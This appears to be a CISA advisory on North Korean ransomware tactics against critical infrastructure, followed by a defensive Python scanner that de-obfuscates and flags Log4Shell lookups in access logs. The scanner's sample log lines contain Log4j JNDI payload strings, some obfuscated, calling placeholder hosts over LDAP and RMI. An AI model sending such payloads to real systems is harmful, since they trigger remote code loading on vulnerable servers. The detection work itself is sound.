Ransomware Attacks on Critical Infrastructure Fund DPRK Malicious Cyber Activities | CISA

February 12, 2023

North Korea (DPRK) employs ransomware attacks on critical infrastructure to fund its malicious cyber activities. The tactics, techniques, and procedures (TTPs) observed in these attacks include traditional ransomware methods and unique strategies aimed at concealing DPRK involvement. Below are the key TTPs used in these operations:

Acquire Infrastructure [T1583]

DPRK actors acquire infrastructure by generating domains, personas, and accounts, and identifying cryptocurrency services to support their ransomware operations. Infrastructure, IP addresses, and domains are often procured using cryptocurrency obtained through illicit activities such as ransomware attacks and cryptocurrency theft.

Obfuscate Identity

To hide their involvement, DPRK actors operate under third-party foreign affiliate identities and use intermediaries to receive ransom payments. These tactics ensure their activities appear to originate from foreign entities, concealing their DPRK affiliation.

Use VPNs and VPSs [T1583.003]

DPRK cyber actors frequently utilize virtual private networks (VPNs) and virtual private servers (VPSs), along with third-country IP addresses, to appear as if they are operating from innocuous locations rather than North Korea.

Gain Access to Networks [TA0001]

To infiltrate networks, DPRK actors exploit common vulnerabilities and exposures (CVEs). Once inside, they escalate privileges and carry out further attacks. Recent CVEs exploited by these actors include:

  • CVE-2021-44228: Remote code execution in the Apache Log4j software library (Log4Shell).
  • CVE-2021-20038: Vulnerability in SonicWall SMA 100 appliances.
  • CVE-2022-24990: Exploited to gain unauthorized access.
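Log4Shell (CVE-2021-44228) is triggered by attacker-controlled lookup strings that land in logged input, and those strings are routinely disguised with nested lookups so that a plain `${jndi:` string match misses them. As an added example that is not part of the advisory, the Python scanner below normalizes the common nested-lookup forms (`${lower:x}`, `${upper:x}` and the `${...:-x}` default-value form) and flags access-log lines that resolve to a `${jndi:...}` lookup; the log lines and hostnames are constructed for illustration.

```python
import re

# Constructed web-server access-log lines (not from the advisory).
# Lines 2-4 carry Log4j lookup strings in the User-Agent field, in plain,
# case-lookup and default-value-lookup obfuscated forms respectively.
SAMPLE_LOGS = [
    '10.0.0.5 - - [12/Feb/2023:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [12/Feb/2023:10:01:03 +0000] "GET /login HTTP/1.1" 200 128 "-" "${jndi:ldap://host1.example/a}"',
    '10.0.0.7 - - [12/Feb/2023:10:01:04 +0000] "GET /api HTTP/1.1" 200 64 "-" "${${lower:j}ndi:${lower:l}dap://x.example/b}"',
    '10.0.0.8 - - [12/Feb/2023:10:01:05 +0000] "GET /api HTTP/1.1" 200 64 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://x.example/c}"',
]

# Leaf lookups only (no nested "${" or "}" inside), so each pass peels one layer.
LOOKUP_CASE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
# "${key:-default}" evaluates to the default when the key is unset; "${::-j}" is the usual trick.
LOOKUP_DEFAULT = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# After normalization the JNDI lookup is flat and can be matched directly.
JNDI = re.compile(r"\$\{\s*jndi\s*:([^}]*)\}", re.IGNORECASE)


def _apply_case(match):
    op, value = match.group(1).lower(), match.group(2)
    return value.lower() if op == "lower" else value.upper()


def normalize_lookups(text, max_rounds=10):
    """Repeatedly resolve innermost lower/upper/default lookups until the text stops changing.

    max_rounds bounds the work so a pathological input cannot spin the scanner.
    """
    for _ in range(max_rounds):
        new = LOOKUP_CASE.sub(_apply_case, text)
        new = LOOKUP_DEFAULT.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def scan_log_lines(lines):
    """Return one finding per line whose normalized content contains a JNDI lookup."""
    findings = []
    for idx, line in enumerate(lines, start=1):
        normalized = normalize_lookups(line)
        m = JNDI.search(normalized)
        if m:
            findings.append({
                "line": idx,
                "src_ip": line.split(" ", 1)[0],   # first field of the combined log format
                "lookup": m.group(0),              # de-obfuscated lookup string for the analyst
                "target": m.group(1),              # scheme://host/path the lookup would resolve
            })
    return findings


if __name__ == "__main__":
    for f in scan_log_lines(SAMPLE_LOGS):
        print(f"line {f['line']} from {f['src_ip']}: {f['lookup']}")
```

The normalizer deliberately only rewrites lookup forms that evaluate to a fixed string; it does not execute anything, and unresolved forms such as `${env:...}` without a default are left in place, where the trailing `${jndi:` check still catches them once the surrounding layers are peeled. For production use, feed the same function the request path and header fields rather than the raw line, since Log4j evaluates whichever of those the application logged.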